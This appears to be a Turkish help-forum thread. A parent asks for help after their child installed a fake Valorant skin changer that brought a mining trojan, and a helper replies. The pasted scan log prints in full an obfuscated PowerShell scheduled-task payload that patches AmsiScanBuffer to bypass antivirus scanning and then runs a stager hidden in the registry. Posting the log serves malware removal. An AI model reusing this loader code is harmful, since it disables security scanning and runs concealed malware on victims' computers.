$_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$BLsWUgXPabQYEv=$esKTVjEbEydev.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$zhDFYQRlKZJklGZhJlg=KUUibsYzdVVZ @([String])([IntPtr]);$HouUUsVdZbZakOwaaqnUNb=KUUibsYzdVVZ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$FjTfoJARZLM=$esKTVjEbEydev.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$qIROLtoHyfQMRl=$BLsWUgXPabQYEv.Invoke($Null,@([Object]$FjTfoJARZLM,[Object]('Load'+'LibraryA')));$BzKZfVwvYaCgfQTdI=$BLsWUgXPabQYEv.Invoke($Null,@([Object]$FjTfoJARZLM,[Object]('Vir'+'tual'+'Pro'+'tect')));$gqDzMuu=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qIROLtoHyfQMRl,$zhDFYQRlKZJklGZhJlg).Invoke('a'+'m'+'si.dll');$thgHnFpRwqzfvbdgl=$BLsWUgXPabQYEv.Invoke($Null,@([Object]$gqDzMuu,[Object]('Ams'+'iSc'+'an'+'Buffer')));$tFojzPMnml=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BzKZfVwvYaCgfQTdI,$HouUUsVdZbZakOwaaqnUNb).Invoke($thgHnFpRwqzfvbdgl,[uint32]8,4,[ref]$tFojzPMnml);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$thgHnFpRwqzfvbdgl,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BzKZfVwvYaCgfQTdI,$HouUUsVdZbZakOwaaqnUNb).Invoke($thgHnFpRwqzfvbdgl,[uint32]8,0x20,[ref]$tFojzPMnml);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)" O22 - Task: nslooksvc64 - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "function Local:yZzuiYRezadz{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$EWellkmPyYZzro,[Parameter(Position=1)][Type]$LjtIPhnXDu)$XEsJbemsTkG=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$XEsJbemsTkG.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$EWellkmPyYZzro).SetImplementationFlags('Runtime,Managed');$XEsJbemsTkG.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$LjtIPhnXDu,$EWellkmPyYZzro).SetImplementationFlags('Runtime,Managed');Write-Output $XEsJbemsTkG.CreateType();}$EznyfjngDAhAs=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$sYOssrpLYJJpjX=$EznyfjngDAhAs.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$aAfmdyFNvhcWtryWFmg=yZzuiYRezadz @([String])([IntPtr]);$iyqMBNsEEaEwzblKaRROoC=yZzuiYRezadz @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$LUQEzwkExfi=$EznyfjngDAhAs.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$vESqRXeDRnNXMw=$sYOssrpLYJJpjX.Invoke($Null,@([Object]$LUQEzwkExfi,[Object]('Load'+'LibraryA')));$gsFUORhqEFVSkXOmO=$sYOssrpLYJJpjX.Invoke($Null,@([Object]$LUQEzwkExfi,[Object]('Vir'+'tual'+'Pro'+'tect')));$MyWMWhO=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vESqRXeDRnNXMw,$aAfmdyFNvhcWtryWFmg).Invoke('a'+'m'+'si.dll');$SNXmKatLTctWUQlcY=$sYOssrpLYJJpjX.Invoke($Null,@([Object]$MyWMWhO,[Object]('Ams'+'iSc'+'an'+'Buffer')));$VNvaCoBJHL=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gsFUORhqEFVSkXOmO,$iyqMBNsEEaEwzblKaRROoC).Invoke($SNXmKatLTctWUQlcY,[uint32]8,4,[ref]$VNvaCoBJHL);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$SNXmKatLTctWUQlcY,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gsFUORhqEFVSkXOmO,$iyqMBNsEEaEwzblKaRROoC).Invoke($SNXmKatLTctWUQlcY,[uint32]8,0x20,[ref]$VNvaCoBJHL);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)" O23 - Service S3: Rockstar Game Library Service - (Rockstar Service) - D:\Games\Grand Theft Auto V\Launcher\RockstarService.exe (file missing)
Aktif zararlının silinmiş olması lazım. Kaspersky'i tekrar kurarak test edebilirsiniz. Ayrıyeten aşağıdaki araçla sisteme tam tarama yapmanızı öneririm.
Emsisoft - Emergency Kit: Free Portable Malware Scan and Removal
Emsisoft Emergency Kit is the ultimate free anti-malware and antivirus tool to scan, detect and remove viruses, keyloggers and other malware threats.www.emsisoft.com
Arkadaşlar merhaba, kardeşim dün Valorant skin changer diye saçma bir program yüklemiş 9 yaşında kendisi haberim dışında yapmış, mining virüsü bulaştı bilgisayara bir kısmını silebildim fakat Kaspersky bir virüsü silemedi adı ''MEM:Trojan.Win32.SEPEH.gen" (konum: Sistem belleği) güvenli modda çalıştırıp silmeyi denedim olmadı dosya konumunu aç'a bastım açılmadı kaldırmaya çalışınca ekran gidiyor.
Denediğim uygulamalar;
Kaspersky Anti-Virüs
360 Total Security.
Trojan remover.
Bunların yanında malware bytes deneyecektim fakat kurulumun sonunda yanıt vermiyor ve kapanıyor. (internette birısınma sorunu bununla çözdüğünü yazmış.)
Ayrıca bu virüs başladığından beri Windows+s çalışmıyor Görev Yöneticisi açılışta hata veriyordu ve SSD acayip yavaşladı.
Ayrıca ekran kartı driverimi güncelleyemiyorum. (hata 1603)
Bu sitenin çalışmasını sağlamak için gerekli çerezleri ve deneyiminizi iyileştirmek için isteğe bağlı çerezleri kullanıyoruz.